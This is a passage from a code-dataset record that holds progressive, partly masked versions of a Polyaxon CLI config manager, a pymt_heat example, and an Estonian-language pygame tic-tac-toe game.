"step-5": "#!/usr/bin/python\n#\n# Copyright 2018-2020 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom distutils.version import LooseVersion # pylint:disable=import-error\n\nfrom polyaxon.managers.base import BaseConfigManager\nfrom polyaxon.schemas.cli.cli_config import CliConfigurationConfig\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = \".cli\"\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(\n cls,\n check_count=None,\n current_version=None,\n server_versions=None,\n log_handler=None,\n ):\n if not any([check_count, current_version, server_versions, log_handler]):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.min_version)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(n)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
heat = Heatmodel()
n = heat.get_component_name()
print(n)
<|reserved_special_token_1|>
from pymt_heat import Heatmodel
heat = Heatmodel()
n = heat.get_component_name()
print(n)
|
flexible
|
{
"blob_id": "82801ce564f4f29e084e6f842d7868eb60f582cb",
"index": 6225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(n)\n",
"step-3": "<mask token>\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-4": "from pymt_heat import Heatmodel\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pygame.init()
ttt = pygame.display.set_mode((300, 325))
pygame.display.set_caption = 'Trips-Traps-Trull'
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
XO = 'X'
joonestik = [[None, None, None], [None, None, None], [None, None, None]]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
if event.type is QUIT:
jooksutab = 0
elif event.type is MOUSEBUTTONDOWN:
klikk_tabelis(tabel)
mängu_võitja(tabel)
näita_tabelit(ttt, tabel)
if võitja is not None:
break
<|reserved_special_token_1|>
import pygame
from pygame.locals import *
pygame.init()
ttt = pygame.display.set_mode((300, 325))
pygame.display.set_caption = 'Trips-Traps-Trull'
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
XO = 'X'
joonestik = [[None, None, None], [None, None, None], [None, None, None]]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
if event.type is QUIT:
jooksutab = 0
elif event.type is MOUSEBUTTONDOWN:
klikk_tabelis(tabel)
mängu_võitja(tabel)
näita_tabelit(ttt, tabel)
if võitja is not None:
break
<|reserved_special_token_1|>
import pygame
from pygame.locals import *
pygame.init()
ttt = pygame.display.set_mode((300,325)) #loome mänguakna
pygame.display.set_caption = ("Trips-Traps-Trull")
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250,250,250))
#tõmbame jooned
pygame.draw.line (taust, (0,0,0), (100,0), (100,300), 2) #vertikaalsed jooned
pygame.draw.line (taust, (0,0,0), (200,0), (200,300), 2)
pygame.draw.line (taust, (0,0,0), (0,100), (300,100), 2) #horisontaalsed jooned
pygame.draw.line (taust, (0,0,0), (0,200), (300,200), 2)
return taust
def näita_tabelit (ttt, tabel):
hetkeseis(tabel)
ttt.blit (tabel, (0,0))
pygame.display.flip()
def hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat):
if (Ykoordinaat < 100): #millisele reale klikib
rida = 0
elif (Ykoordinaat < 200):
rida = 1
else:
rida = 2
if (Xkoordinaat < 100): #millisele veerule klikib
veerg = 0
elif (Xkoordinaat < 200):
veerg = 1
else:
veerg = 2
return (rida, veerg)
def klikk_tabelis (tabel): #teeme kindlaks kuhu klikiti
global joonestik, XO
(Xkoordinaat, Ykoordinaat) = pygame.mouse.get_pos()
(rida, veerg) = hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O': #kontrollime kas lahter on kasutusel
return #lahter on juba kasutusel
joonistamine (tabel, rida, veerg, XO) #joonista X või O
if (XO == 'X'):
XO = 'O' #käigu üleandmine teisele inimesele
else:
XO = 'X'
def joonistamine (tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
#leiame keskkoha
Ykeskkoht = tabelirida * 100 + 50
if (Tähis == 'O'): #joonistame O
pygame.draw.circle (tabel, (0,0,0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line (tabel, (0,0,0), (Xkeskkoht - 22, Ykeskkoht - 22), (Xkeskkoht + 22, Ykeskkoht + 22), 2)
#joonistame X
pygame.draw.line (tabel, (0,0,0), (Xkeskkoht + 22, Ykeskkoht - 22), (Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis #märgime lahtri kasutatuks
def mängu_võitja(tabel): #kontrollib, kas kumbki võitis
global joonestik, võitja
for rida in range (0, 3): #kontrollime ridu
if joonestik [rida][0] == joonestik[rida][1] == joonestik[rida][2] and joonestik [rida][0] is not None:
võitja = joonestik[rida][0] #see rida võitis
pygame.draw.line (tabel, (250,0,0), (0, (rida + 1)*100 - 50), (300, (rida + 1)*100 - 50), 2)
break
for veerg in range (0, 3): #kontrollime veerge
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg] #see veerg võitis
pygame.draw.line (tabel, (250,0,0), ((veerg + 1)* 100 - 50, 0), ((veerg + 1)* 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0] is not None: #kontrollime diagonaale
võitja = joonestik[0][0] #vasakult paremale diagonaal võitis
pygame.draw.line (tabel, (250,0,0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2] is not None:
võitja = joonestik[0][2] #paremalt vasakule diagonaal võitis
pygame.draw.line (tabel, (250,0,0), (250, 50), (50, 250), 2)
def hetkeseis (tabel): #kuva hetkeseis(kelle käik/kes võitis)
global XO, võitja
if võitja is None:
sõnum = XO + " käib"
else:
sõnum = võitja + " võitis!"
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0,0,0))
#kopeerime sõnumi mänguaknas
tabel.fill ((250, 250, 250), (0, 300, 300, 25))
tabel.blit (tekst, (10, 300))
XO = 'X' #X alustab
joonestik = [ [ None, None, None ], #tühjad lahtrid
[ None, None, None ],
[ None, None, None ] ]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
if event.type is QUIT:
jooksutab = 0
elif event.type is MOUSEBUTTONDOWN:
klikk_tabelis(tabel)
mängu_võitja(tabel) #kontrollib võitjat peale igat käiku
näita_tabelit(ttt,tabel) #uuendab mängulauda
if võitja is not None:
break
|
flexible
|
{
"blob_id": "a667c4cb0a30ee67fe982bb96ece6bb75f25f110",
"index": 7084,
"step-1": "<mask token>\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\n<mask token>\n",
"step-3": "<mask token>\npygame.init()\nttt = pygame.display.set_mode((300, 325))\npygame.display.set_caption = 'Trips-Traps-Trull'\nvõitja = None\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = 